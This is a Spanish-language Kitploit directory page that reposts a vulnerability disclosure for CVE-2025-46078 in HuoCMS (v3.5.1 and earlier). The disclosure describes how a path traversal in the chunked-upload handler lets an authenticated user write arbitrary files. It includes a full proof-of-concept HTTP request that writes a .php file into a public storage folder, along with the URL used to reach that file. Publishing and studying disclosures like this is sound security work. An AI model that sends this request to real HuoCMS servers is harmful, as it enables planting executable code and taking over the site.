Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-46078 — Descripcion de la vulnerabilidad | Kitploit
Herramientas/GitHubGitHub/yggcwhat/cve-2025-46078
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónMala Configuración
GitHubyggcwhat/cve-2025-46078

CVE-2025-46078

Descripcion de la vulnerabilidad

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

BUG_Author:

yggcwhat

Versión afectada:

Huocms

Proveedor:

https://huocms.com/

Dirección del código fuente:

https://gitee.com/digital-flag/huocms

Archivo vulnerable:

Upload.php

Versión afectada:

HuoCMS - <=V3.5.1

Descripción:

En el método sliceUploadAndSave de AttachmentController.php (ubicado en app -> controller -> backend), el parámetro resource_type se valida contra una lista blanca de extensiones de archivo permitidas (por ejemplo, txt, png, etc.). Posteriormente, el método invoca a tmpMove de Upload.php (ubicado en app -> service -> upload).

El método tmpMove primero crea un archivo. Sin embargo, el parámetro $filename (controlado por el parámetro de entrada resource_temp_path, que es controlable por el usuario) puede explotarse para atravesar directorios (por ejemplo, usando ../) y crear carpetas. A continuación, el método realiza una operación de movimiento, colocando el archivo en el directorio creado. El nombre final del archivo se genera añadiendo un guion bajo y el sufijo $pos, donde $pos se controla mediante el parámetro chunk_index pasado durante la llamada (consulte el paso real de parámetros para más detalles).

Esto crea una vulnerabilidad en la que un atacante podría manipular resource_temp_path y chunk_index para escribir archivos en ubicaciones arbitrarias con nombres de archivo controlados.

Detalles: app >controller >backend > AttachmentController.php:sliceUploadAndSave image

app >service >upload > Upload.php:tmpMove image image

Esta vulnerabilidad afecta al backend: para invocarla es necesario iniciar sesión en el backend y obtener un token. Configure el entorno e inicie sesión usted mismo.

POC:

root@kitploit:~
POST /attachment/sliceUploadAndSave HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: token
Content-Type: multipart/form-data; boundary=----geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Length: 990
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_chunk"; filename="blob"
Content-Type: application/octet-stream

1
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="chunk_total"

1
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="chunk_index"

.php
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_temp_basename"

.php
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_temp_path"

../../../public/storage/image/20250415/
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_type"

txt
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_name"

11.png
------geckoformboundary13d3934e0299a09e8748d146bfb9d483--

image

URL de acceso:
http://127.0.0.1/storage/image/20250415/%5f%5f.php image

Referencia:

http://huocms.com https://github.com/yggcwhat/CVE-2025-46078/edit/main/README.md https://www.huocms.com/

Descargar herramienta